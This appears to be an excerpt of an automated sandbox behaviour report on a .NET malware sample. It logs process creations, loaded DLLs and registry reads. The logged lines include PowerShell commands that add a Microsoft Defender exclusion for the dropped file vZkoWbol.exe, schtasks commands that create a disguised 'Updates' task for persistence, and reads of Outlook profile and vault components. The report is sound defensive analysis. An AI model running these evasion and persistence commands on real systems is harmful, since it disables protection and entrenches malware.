                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: z1E-catalogSamples.exeReversingLabs: Detection: 71%
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeFile read: C:\Users\user\Desktop\z1E-catalogSamples.exe:Zone.IdentifierJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\z1E-catalogSamples.exe "C:\Users\user\Desktop\z1E-catalogSamples.exe"
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess created: C:\Users\user\Desktop\z1E-catalogSamples.exe "C:\Users\user\Desktop\z1E-catalogSamples.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\vZkoWbol.exe C:\Users\user\AppData\Roaming\vZkoWbol.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess created: C:\Users\user\AppData\Roaming\vZkoWbol.exe "C:\Users\user\AppData\Roaming\vZkoWbol.exe"
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess created: C:\Users\user\AppData\Roaming\vZkoWbol.exe "C:\Users\user\AppData\Roaming\vZkoWbol.exe"
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess created: C:\Users\user\Desktop\z1E-catalogSamples.exe "C:\Users\user\Desktop\z1E-catalogSamples.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess created: C:\Users\user\AppData\Roaming\vZkoWbol.exe "C:\Users\user\AppData\Roaming\vZkoWbol.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess created: C:\Users\user\AppData\Roaming\vZkoWbol.exe "C:\Users\user\AppData\Roaming\vZkoWbol.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: z1E-catalogSamples.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: z1E-catalogSamples.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, qf3KIIPkQkHyoPCAGD.cs.Net Code: eKVopiT5yk System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_03040C3D push edi; ret 6_2_03040CC2
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_03040C95 push edi; retf 6_2_03040C3A
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 7_2_066304E6 push esi; ret 7_2_066304E7
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_013D0C3D push edi; ret 12_2_013D0CC2
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D46ED1 push es; ret 12_2_06D46EE0
                      Source: z1E-catalogSamples.exeStatic PE information: section name: .text entropy: 7.919359410493161
                      Source: vZkoWbol.exe.0.drStatic PE information: section name: .text entropy: 7.919359410493161
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, zsIBsGprx7y00SlIL7.csHigh entropy of concatenated method names: 'WPCeObyGsQ', 'uABeTAh4rM', 'Bkee1cyswW', 'WCjerSFmRu', 'cvXeW9Mjc2', 'LGfegi6soH', 'dFceBuoj3w', 'kM1e3PYeLB', 'kOee5qqjok', 'BqDedL32og'
